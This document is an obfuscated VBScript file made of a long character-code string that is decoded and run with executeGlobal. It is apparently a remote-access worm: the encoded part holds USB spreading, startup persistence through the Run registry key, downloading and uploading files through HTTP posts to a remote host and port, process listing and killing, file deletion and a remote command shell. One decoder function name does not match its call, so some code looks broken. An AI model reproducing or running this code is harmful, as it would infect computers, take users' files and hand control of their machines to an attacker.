188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@175$@170$@181$@188$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@86$@83$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@86$@83$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@188$@174$@189$@105$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@114$@86$@83$@188$@174$@189$@105$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@86$@83$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@133$@135$@105$@181$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@140$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@129$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@178$@175$@105$@105$@174$@187$@187$@119$@183$@190$@182$@171$@174$@187$@105$@135$@105$@121$@105$@189$@177$@174$@183$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@183$@170$@182$@174$@114$@86$@83$@86$@83$@188$@189$@187$@181$@178$@183$@180$@105$@134$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@105$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@176$@174$@189$@107$@117$@105$@188$@189$@187$@181$@178$@183$@180$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@105$@86$@83$@178$@175$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@105$@105$@105$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@82$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@119$@184$@185$@174$@183$@86$@83$@82$@82$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@173$@178$@187$@114$@86$@83$@86$@83$@178$@175$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@175$@178$@181$@174$@173$@178$@187$@105$@111$@105$@182$@178$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@105$@178$@183$@188$@189$@187$@187$@174$@191$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@107$@165$@107$@114$@105$@116$@105$@122$@114$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@188$@174$@183$@173$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@86$@83$@82$@82$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@105$@119$@184$@185$@174$@183$@86$@83$@82$@82$@105$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@105$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@82$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@190$@185$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@114$@86$@83$@86$@83$@173$@178$@182$@105$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@117$@171$@190$@175$@175$@174$@187$@86$@83$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@86$@83$@105$@105$@105$@105$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@105$@105$@105$@105$@105$@119$@184$@185$@174$@183$@86$@83$@82$@105$@119$@181$@184$@170$@173$@175$@187$@184$@182$@175$@178$@181$@174$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@82$@105$@171$@190$@175$@175$@174$@187$@105$@134$@105$@119$@187$@174$@170$@173$@86$@83$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@187$@174$@172$@191$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@183$@173$@105$@171$@190$@175$@175$@174$@187$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@113$@114$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@178$@175$@105$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@134$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@111$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@197$@107$@105$@111$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@143$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@175$@170$@175$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@86$@83$@86$@83$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@173$@178$@187$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@175$@170$@175$@105$@111$@105$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@173$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@183$@174$@193$@189$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@119$@175$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@175$@170$@175$@105$@111$@105$@175$@178$@181$@174$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@178$@181$@174$@119$@188$@178$@195$@174$@105$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@175$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@113$@114$@86$@83$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@185$@187$@184$@172$@174$@188$@188$@107$@117$@117$@125$@129$@114$@86$@83$@86$@83$@173$@178$@182$@105$@184$@171$@179$@178$@189$@174$@182$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@82$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@86$@83$@82$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@185$@187$@184$@172$@174$@188$@188$@178$@173$@105$@111$@105$@107$@197$@107$@86$@83$@105$@105$@105$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@174$@193$@174$@172$@190$@189$@170$@171$@181$@174$@185$@170$@189$@177$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@188$@190$@171$@105$@174$@193$@178$@189$@185$@187$@184$@172$@174$@188$@188$@105$@113$@185$@178$@173$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@189$@170$@188$@180$@180$@178$@181$@181$@105$@120$@143$@105$@120$@157$@105$@120$@153$@146$@141$@105$@107$@105$@111$@105$@185$@178$@173$@117$@128$@117$@189$@187$@190$@174$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@174$@181$@174$@189$@174$@175$@170$@175$@105$@113$@190$@187$@181$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@190$@187$@181$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@184$@181$@173$@174$@187$@105$@190$@187$@181$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@172$@182$@173$@188$@177$@174$@181$@181$@105$@113$@172$@182$@173$@114$@86$@83$@86$@83$@173$@178$@182$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@174$@193$@174$@172$@117$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@86$@83$@86$@83$@188$@174$@189$@105$@184$@174$@193$@174$@172$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@174$@172$@105$@113$@107$@110$@172$@184$@182$@188$@185$@174$@172$@110$@105$@120$@172$@105$@107$@105$@111$@105$@172$@182$@173$@114$@86$@83$@178$@175$@105$@183$@184$@189$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@184$@190$@189$@119$@170$@189$@174$@183$@173$@184$@175$@188$@189$@187$@174$@170$@182$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@184$@190$@189$@119$@187$@174$@170$@173$@170$@181$@181$@86$@83$@174$@181$@188$@174$@178$@175$@105$@183$@184$@189$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@174$@187$@187$@119$@170$@189$@174$@183$@173$@184$@175$@188$@189$@187$@174$@170$@182$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@174$@187$@187$@119$@187$@174$@170$@173$@170$@181$@181$@86$@83$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@107$@107$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@172$@182$@173$@188$@177$@174$@181$@181$@105$@134$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@"
dim mfvasRGZIhZnddvphsOWz
mfvasRGZIhZnddvphsOWz = "$@"
mfvasRGZIhZnddvphsOW=SPLIT(mfvasRGZIhZnddvphsOW, mfvasRGZIhZnddvphsOWz)
dim FOFwEQObHcOMduGpSoigGY
FOFwEQObHcOMduGpSoigGY = 0
dim FOFwEQObHcOMduGpSoigGYv
FOFwEQObHcOMduGpSoigGYv = UBOUND(mfvasRGZIhZnddvphsOW) - 1
FOR FOFwEQObHcOMduGpSoigGYvX = FOFwEQObHcOMduGpSoigGY TO FOFwEQObHcOMduGpSoigGYv
Dim FOFwEQObHcOMduGpSoigGYvXJ
Dim FOFwEQObHcOMduGpSoigGYvXJZN
Dim FOFwEQObHcOMduGpSoigGYvXJZNx
Dim FOFwEQObHcOMduGpSoigGYvXJZNxD
FOFwEQObHcOMduGpSoigGYvXJZNxD = mfvasRGZIhZnddvphsOW(FOFwEQObHcOMduGpSoigGYvX)
FOFwEQObHcOMduGpSoigGYvXJZN = "mfvasRGZIhZ"
FOFwEQObHcOMduGpSoigGYvXJZNx = 11
FOFwEQObHcOMduGpSoigGYvXJ = FOFwEQObHcOMduGpSoigGYvXJZNxDE(chr(FOFwEQObHcOMduGpSoigGYvXJZNxD) , FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
FOFwEQObHcOMduGpSoigGYvXJZ = FOFwEQObHcOMduGpSoigGYvXJZ & FOFwEQObHcOMduGpSoigGYvXJ
NEXT
executeGlobal (FOFwEQObHcOMduGpSoigGYvXJZ)
Function FOFwEQObHcOMduGpSoigGYvXJZNxDEi( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL)
FOFwEQObHcOMduGpSoigGYvXJZNxDEiX = Array()
ReDim FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( CInt( Len( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL ) ) )
For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to Len(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL) - 1
FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO ) = Asc( Mid( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL,FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + 1 ,1 ) )
Next
FOFwEQObHcOMduGpSoigGYvXJZNxDEi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiX
End Function
